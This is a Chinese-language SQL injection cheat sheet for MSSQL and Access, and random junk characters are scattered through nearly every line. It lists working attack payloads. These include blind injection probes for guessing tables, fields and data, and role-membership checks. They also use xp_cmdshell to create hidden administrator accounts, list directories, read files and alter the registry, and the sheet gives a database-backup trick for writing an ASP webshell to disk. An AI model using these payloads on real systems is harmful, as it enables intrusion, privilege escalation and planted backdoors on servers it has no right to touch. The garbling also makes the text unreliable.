1.判断是否有注入;and 1=1 ;and 1=2 D�9M�:�^��
2.初步判断是否是mssql ;and user>0 �+Sw�R+H)?
pR~�U�`r5z
3.注入参数是字符'and [查询条件] and ''=' 8<��H�f"�M
5LOo��8xN�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �_4g�.j���
eU�g~)m5�G
5.判断数据库系统 e=.]F*:J�
�-Z'�s@'*�
;and (select count(*) from sysobjects)>0 mssql
VNY%R,�6
��D*lKn6�2
;and (select count(*) from msysobjects)>0 access K5lmVF\�$P
jYKor7KTqT
f��k&8]tK4
^pUHKXi�hD
6.猜数据库 ;and (select Count(*) from [数据库名])>0 '3g[�]M@M�
"s{�5��O>�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 WY�r/oRO��
BqT y~{)+�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 r(�P(R�j2~
��lv04g} W
9.(1)猜字段的ascii值(access) @�Z12��CrJ
�
P
���Y�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 t2)rUWg���
M]�J��^�N#
(2)猜字段的ascii值(mssql) ')$�+G15�2
4q�k9NK2 U
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �9g�mW&{6q
%�
y�w?s�0
10.测试权限结构(mssql) � �a24"y�T
o���7$'c�n
�!�4X
f�~P
I"ok&�^t^}
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �}�|pwz �
R#I0|;q4|p
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 1]p ZrBh"E
Zus�E��fh?
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- P(�f0R�8BE
NGb�G�4-w-
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- H5Io{�B%=�
e7sp =�I�,
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- <P��=twT;P
q��H�rc9fB
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +8R�g�F ��
Vc�Xq?f>\�
;and 1=(select IS_MEMBER('db_owner'));-- (�)6wvu}��
32`{7a3!�=
V)[@98T_4?
j3{D^|�0bP
11.添加mssql和系统的帐户 y�j�F1}SQ�
�7Mg=b%IYs
;exec master.dbo.sp_addlogin username;-- $a�db�CY�\
;exec master.dbo.sp_password null,username,password;-- ��6�V7B;tB
%y�v<y+yP~
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- :�qd`zG��3
JPoN&BTCj�
;exec master.dbo.xp_cmdshell 'net user username password ~=uWD&5B�4
T�9Nb`sbV]
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �K�/|Z$4S
A�\�HxDI�U
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �`�ojoOB^L
mj�W8��Q\D
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- a�WR}R��>E
7+\+DujE�$
�=4FXBPoQK
;wz^g�d�h;
12.(1)遍历目录 Utnr5^].2O
W�E:�2�4b6
;create table dirs(paths varchar(100), id int) d�?A
0MKnl
|#�]@�Z)xa
;insert dirs exec master.dbo.xp_dirtree 'c:\' X:vg�hOt?�
lPw�%�E�rG
;and (select top 1 paths from dirs)>0 u>2
l7�PA|
qVH1���}9_
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) .\)��U@L�~
&�m�-PC(W+
[�O�C��5l>
�E�2R&[Q"%
(2)遍历目录 X\{�LnZ@r4
�< t,zaIi
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- /`��wvx�KX
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 P��HZ0P7��
@~���^�5l
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �TFlet"ge=
j���+�$rj
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �wl#@lOv-P
(|klSz_4LM
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 9\_eK,�*B�
�8%A#`)fb
'>-gi}z�7�
I �?gS�G*m
13.mssql中的存储过程 �(nf�~��x
nn@-W����]
xp_regenumvalues 注册表根键, 子键 "_-Po^�u=r
�%A1o.�{�H
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 oX�3�0�VfT
5�z���7U1:
xp_regread 根键,子键,键值名 \LR�~r%(rM
&"�&Z
#llb
;exec xp_regread Q�dF5�Cwf4
�>=:&D)�m"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ILEz;D{]��
VV��a��c:�
xp_regwrite 根键,子键, 值名, 值类型, 值 �WW�4vn|0v
v%+:�/�m1
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 h�T�`J1nNt
O�}-�jCW;K
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 zz���TfYf)
&�S�w%<N*r
xp_regdeletevalue 根键,子键,值名 ��u0�|8Tgf
Izik��Dc10
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 )dbB��=OZ
mF*2#]%dx
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ���h�YPl&^
� oM�2l-[-
Wh+{m�vu#�
�r`W)�0oxD
14.mssql的backup创建webshell Eo��fymAi%
>,�gg5<F-E
use model >s>1[W��@*
52:HNA\�E/
create table cmd(str image); :6�1�T�un
v1o#1���;
insert into cmd(str) values (''); 3er nT�D*`
�H�HDl8�lo
backup database model to disk='c:\l.asp'; q r�J�`1��
{��XR6�>�]
x�+��Ttl4�
-]�/I73!�b
15.mssql内置函数 #lmB
�AL~3
t<#mP@Mz=N
;and (select @@version)>0 获得Windows的版本号 ^�Cu��\�VV
Aw�$x��;3y
;and user_name()='dbo' 判断当前系统的连接用户是不是sa z�i|+�HM��
j9eTCJ��qB
;and (select user_name())>0 爆当前系统的连接用户 -+��(j�q>t
K�28+]qy�[
;and (select db_name())>0 得到当前连接的数据库 ALr�w�\q�V
q�L��n/�2�
�+T|�JK�7�
[ey:e6,�T9
16.简洁的webshell �ZZ2vvtlyG
^U
`[�(kz=
use model �Ixb=L��(V
2|3)S�`WZl
create table cmd(str image); R�Q�� vf�t
i6�dHrx]:,
insert into cmd(str) values (''); �L�Jd5;so-
diJ�LZik�k
backup database model to disk='g:\wwwtest\l.asp';
